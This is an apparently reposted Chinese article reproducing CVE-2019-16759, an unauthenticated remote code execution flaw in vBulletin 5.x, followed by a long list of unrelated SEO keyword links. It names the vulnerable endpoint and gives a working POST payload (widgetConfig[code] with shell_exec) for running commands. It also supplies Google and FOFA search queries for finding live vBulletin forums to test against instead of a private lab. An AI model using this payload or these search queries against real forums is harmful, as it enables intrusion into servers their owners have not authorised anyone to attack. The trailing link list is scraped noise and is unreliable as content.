vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析
发表于:2025-12-03 作者:千家信息网编辑
千家信息网最后更新 2025年12月03日,vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。0x00
千家信息网最后更新 2025年12月03日vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析
vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
0x00 简介
vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS,该CMS国外大量论坛使用,中国国内少许网站使用。近日,vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。
0x01 漏洞概述
漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。
0x02 影响范围
5.0.0 <= vBulletin <=5.5.4
0x03 环境搭建
自行搭建需要付费,因此这里使用google语法和FOFA查找
google语法:
site:*.vbulletin.net
Powered by vBulletin
FOFA:
content="vBulletin"
app="vBulletin"
在线靶场获取方式
转发本文至朋友圈并截图发至公众号内即可
0x04 漏洞利用
进入如下vBulletin论坛
访问/index.php?routestring=ajax/render/widget_php会显示以下结果

然后POST如下数据即可执行命令whoami
widgetConfig[code] = echo shell_exec('whoami'); exit;0x05 修复方式
安全更新补丁下载:
http://members.vbulletin.com/patches.php
关于vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
漏洞
论坛
分析
问题
代码
方式
更多
用户
用户量
语法
帮助
解答
低廉
强大
易行
安全
简单易行
公众
内容
前台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
我的世界租服务器如何加mod
网络安全用语书签
依数据库赖关系
全国网络安全大赛
中山无限软件开发定做价格
iceraven同步服务器
360家电网络安全
河北省明优网络技术有限公司
军营网络安全宣传微视频
文明上网 网络安全知识
数据库有哪些种
天下3怎么两个服务器排棋局
互联网新科技革命对世界经济
软件开发学习培训班
仟之微网络技术
mysql怎样设置数据库编码
湖北两会网络安全
仁王2连不上服务器steam
网络技术安全防控
网络安全手抄报容微信对话
郓城天晶网络技术公司
网络安全网络优化方案
计算机 网络安全
1.17小游戏服务器
菲律宾独立服务器
山西师范大学网络安全
国外的计算机网络技术
网络技术培训需要多久
高性能web服务器架构
计算机网络技术基础认识